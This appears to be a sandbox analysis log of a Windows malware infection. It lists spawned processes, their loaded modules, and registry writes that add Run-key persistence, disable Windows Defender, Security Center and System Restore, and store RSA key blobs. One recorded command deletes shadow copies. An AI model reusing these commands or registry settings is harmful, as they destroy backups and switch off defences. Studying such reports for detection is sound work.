c:\windows\system32\msvcrt.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\msvcr100.dll
c:\windows\system32\apphelp.dll
c:\users\admin\4950606094303050\wincfg32svc.exe

PID
2928
CMD
C:\Users\admin\657607470096780\winsvcs.exe
Path
C:\Users\admin\657607470096780\winsvcs.exe
Indicators
Parent process
2746537711.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Description
Version
Modules
Image
c:\users\admin\657607470096780\winsvcs.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msvcr100.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\profapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\version.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\apphelp.dll
c:\users\admin\appdata\local\temp\1958842343.exe
c:\users\admin\appdata\local\temp\3088011411.exe

PID
3568
CMD
C:\Users\admin\4950606094303050\wincfg32svc.exe
Path
C:\Users\admin\4950606094303050\wincfg32svc.exe
Indicators
Parent process
3875839546.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Description
Version
Modules
Image
c:\users\admin\4950606094303050\wincfg32svc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\msvcr100.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\wshtcpip.dll

PID
2180
CMD
C:\Users\admin\AppData\Local\Temp\3468116065.exe
Path
C:\Users\admin\AppData\Local\Temp\3468116065.exe
Indicators
Parent process
winsvcs.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\3468116065.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\mpr.dll
c:\windows\system32\wininet.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msvcr100.dll
c:\windows\system32\profapi.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\netutils.dll
c:\windows\system32\browcli.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\propsys.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\iconcodecservice.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\version.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\userenv.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\schannel.dll
c:\windows\system32\credssp.dll
c:\windows\system32\secur32.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll

PID
2160
CMD
C:\Users\admin\AppData\Local\Temp\1958842343.exe
Path
C:\Users\admin\AppData\Local\Temp\1958842343.exe
Indicators
No indicators
Parent process
winsvcs.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\1958842343.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msvcr100.dll

PID
2124
CMD
C:\Users\admin\AppData\Local\Temp\3088011411.exe
Path
C:\Users\admin\AppData\Local\Temp\3088011411.exe
Indicators
No indicators
Parent process
winsvcs.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\3088011411.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\msvcr100.dll

PID
3940
CMD
"C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
Path
C:\Windows\system32\wbem\wmic.exe
Indicators
No indicators
Parent process
3468116065.exe
User
admin
Integrity Level
MEDIUM
Exit code
2147749908
Version:
Company
Microsoft Corporation
Description
WMI Commandline Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\wbem\wmic.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\msxml3.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\program files\common files\microsoft shared\office14\msoxmlmf.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\wbem\wmiutils.dll

PID
3828
CMD
C:\Users\admin\AppData\Local\Temp\3358028963.exe
Path
C:\Users\admin\AppData\Local\Temp\3358028963.exe
Indicators
No indicators
Parent process
winsvcs.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\3358028963.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msvcr100.dll

PID
3124
CMD
C:\Users\admin\AppData\Local\Temp\3782739527.exe
Path
C:\Users\admin\AppData\Local\Temp\3782739527.exe
Indicators
No indicators
Parent process
winsvcs.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\3782739527.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\msctf.dll
c:\windows\system32\imm32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\mpr.dll
c:\windows\system32\wininet.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msvcr100.dll
c:\windows\system32\profapi.dll

Registry activity

Total events
1289
Read events
1116
Write events
171
Delete events
2

Modification events

PID
Process
Operation
Key
Name
Value
3736
2746537711.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Microsoft Windows Services
C:\Users\admin\657607470096780\winsvcs.exe
3736
2746537711.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Microsoft Windows Services
C:\Users\admin\657607470096780\winsvcs.exe
2884
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2884
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3784
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
3784
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
3784
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
3784
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
3784
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
3784
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
3784
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
3784
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
3784
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
3784
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
3784
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
3784
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
3784
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing
3784
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3784
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3844
979574639568794.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Microsoft Windows Services
C:\Users\admin\495030305060\winsvcs.exe
2648
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASAPI32
EnableFileTracing
0
2648
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASAPI32
EnableConsoleTracing
0
2648
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASAPI32
FileTracingMask
4294901760
2648
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASAPI32
ConsoleTracingMask
4294901760
2648
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASAPI32
MaxFileSize
1048576
2648
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASAPI32
FileDirectory
%windir%\tracing
2648
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASMANCS
EnableFileTracing
0
2648
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASMANCS
EnableConsoleTracing
0
2648
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASMANCS
FileTracingMask
4294901760
2648
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASMANCS
ConsoleTracingMask
4294901760
2648
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASMANCS
MaxFileSize
1048576
2648
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASMANCS
FileDirectory
%windir%\tracing
2648
winsvcs.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
2648
winsvcs.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000069000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
2648
winsvcs.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2648
winsvcs.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2820
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtBMP
2820
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtIcon
2820
WinRAR.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
2820
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
0
C:\Users\admin\AppData\Local\Temp\Love_You_2019_33235120-txt.zip
2820
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
name
120
2820
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
size
80
2820
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
type
120
2820
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
mtime
100
2820
WinRAR.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
@C:\Windows\System32\wshext.dll,-4804
JScript Script File
2820
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\MainWin
Placement
2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF42000000420000000204000037020000
2820
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General
LastFolder
C:\Users\admin\AppData\Local\Temp
2820
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
name
120
2820
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
size
80
2820
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
psize
80
2820
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
type
120
2820
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
mtime
100
2820
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
crc
70
2820
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band56_0
38000000730100000402000000000000D4D0C800000000000000000000000000320101000000000039000000B40200000000000001000000
2820
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band56_1
38000000730100000500000000000000D4D0C8000000000000000000000000003401010000000000160000002A0000000000000002000000
2820
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band56_2
38000000730100000400000000000000D4D0C8000000000000000000000000001C0102000000000016000000640000000000000003000000
3676
3875839546.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
WinCfgMgr
C:\Users\admin\4950606094303050\wincfg32svc.exe
3676
3875839546.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
WinCfgMgr
C:\Users\admin\4950606094303050\wincfg32svc.exe
2928
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection
DisableScanOnRealtimeEnable
1
2928
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection
DisableOnAccessProtection
1
2928
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection
DisableBehaviorMonitoring
1
2928
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
AntiVirusOverride
1
2928
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
UpdatesOverride
1
2928
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
FirewallOverride
1
2928
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
AntiVirusDisableNotify
1
2928
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
UpdatesDisableNotify
1
2928
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
AutoUpdateDisableNotify
1
2928
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
FirewallDisableNotify
1
2928
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore
DisableSR
1
2928
winsvcs.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
2928
winsvcs.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
460000006A000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
2928
winsvcs.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2928
winsvcs.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2180
3468116065.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\ex_data\data
ext
2E007A0068007300710076007A000000
2180
3468116065.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\keys_data\data
public
0602000000A40000525341310008000001000100DF2BA59D8757A4C3723EE6E3EF8AE08DFBDA63419C548702CD95810F02DF3BFBA92ECAB17CD52C49775F35132D0ADCF9807126955D3CD390A4746B955311055A6DE2C841D3EE91745B84407E0CE48AE6631B5055B040F2F4A4F4974508355502DCFC056BA0AE9DB6129162A5A3DD779491E148C81D4592851B61C58D2545DC872A9729B4E2DA3239989A3C19CF4D866E5D2717FA212E6B0AF1275FD339B933ED30CEA21457A5ECB3FB9B2E93A07233499195EF4156BF6D9F5045EA186EA0435DDD3E32F3954F2014E83AE921C0AD004F2C029BD5401E1EDABCEA53DB0174E508141118B0D060CD789C6F8C42FE4FC500BA111FC5A6D37AB7D2EE527A62C30187
2180
3468116065.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\keys_data\data
private
940400009304D6E32E28DEE9BC7FC75049739E33049FE4FA29E498A0F5FE09BED0FD2DF3B8C62060CE5799E2BAE14F37CB3BB1DB8C98BEB3E9AC9D7FEF5639E6D6FF1024600316B21B19B0FAB69EF2666286420BA278332A954C160F42B3B85006BDC2E0069EE59628CE42AE5B25D38E6EBDEF4E5DC1BABA99F323478C4AAEA5D3D7A82F2E0D3ADB37B5B6D27BE8FB318FBCE9D9DFB8DFA5F767B7D8006873EEDCE6A9817F1C42BAFE86DD2E945238733EBC99403FBA42045423B263B835A4B5728BECF8C623B099DFD8DEF90EC38E74662359BB64064E8399F4EF624B396B33F01AB1E59C0ED844DA8ECE3367F8BB50ACF5E719491F17C42BB14BC9C85544BD06447744118744E420AEC55E5210DE5F7B822DA3F02BDA8C432CBC78677FB9E32DDB9F9129B885602B20A7F82DAB31A55AB00ADA89A2CD7D0758F03C6E9EC70DB43DF0916982516269179E5BBC6FA4C8D909A6F2C05EC68351113044D82AB805A5577D63F77C0BE45698D7721A470829235667F5FA5346AFEA97F81D536EA6463F0A73903AD18931D2E285F8EEC334F5CF8D11542C88F85FA2AF8AA31CB67DB0FFBC30A1BF3068C77C0B25270D97709EFEB8416BAA52831DA88B18B1D85E975F97F064F58C8C0F4958CE60DC5843F9987A5B9B6D7AF4660BAFEB852CA2091858296C59BE5F4ED58E9E2F6D57692733FDFDC98BF8C3501EEED21EAC1F4DBFD1676747901E0F942AEB1076DD421A44B981DED3D6D76E4611AFCF8B77F0C41CCDB67A0AC62B98F5E5C8791836F62EE69468EBAFF99C7819B9D0CBD901CA587CC5BE55E1A0B4FB3DA1538DF4776004750EA8016A3981FB190F1360699EBA9193CB8791621975E9710B4880E5DA336D68BF2650D94B840970866C1476300F49D1AA1E75CFEAEBE965B9A92D076179A24784A8262E245B0535520A909B00C5DD861E942D62E32B89A2FB1C7F7E09E47C392E0B227D7F1D9527F5F1D922E69FBA9DD4533B63D843CD0585FCD25E6D191B1BB27229E53DFE8F89CCE8E39CF9848C3C6BF0C476CE3B37D4FFEE878155EAF3345FADD17017671353019A9FC5A40BEC0F2D1E6B9459607E59597D1FB4F53F5DB6341D3FCF80031B58406070D230C41225D5B4B0E441552F871D8A9DA5D137293E602C737FF80BB2F8C9848956F670621A88C28286A08FE3AE80571D6070E1C169893C15D1B38125701D2DF4C72B0286FF5B8D5B6F7EF65DC97D84BFA8FF02809BEFAB34FA94346C2407914A19EE5AEAF6071D1EE73734793F0775A7508A69070F656FDE08013673F4BF2D46FA83F94CE2207885D3F91EC9028BB03F4FD6501749592C907BD9B5F5DA817F9F5494940AD7F8B6832719E914A0574409CBD61B283B90881CFA0717E7D7FD14C15A2E251851B0100982898E0CA57C6731D99C88D80B5918204FFD85F2574D2C845042622FB609865AC9BABC653EBE5F0D00D8560B7217BAA96501B04AE93CC1742C2D1BBF6E7E91B1643DA1E9235506E476F00C63FAF23B9C0D84E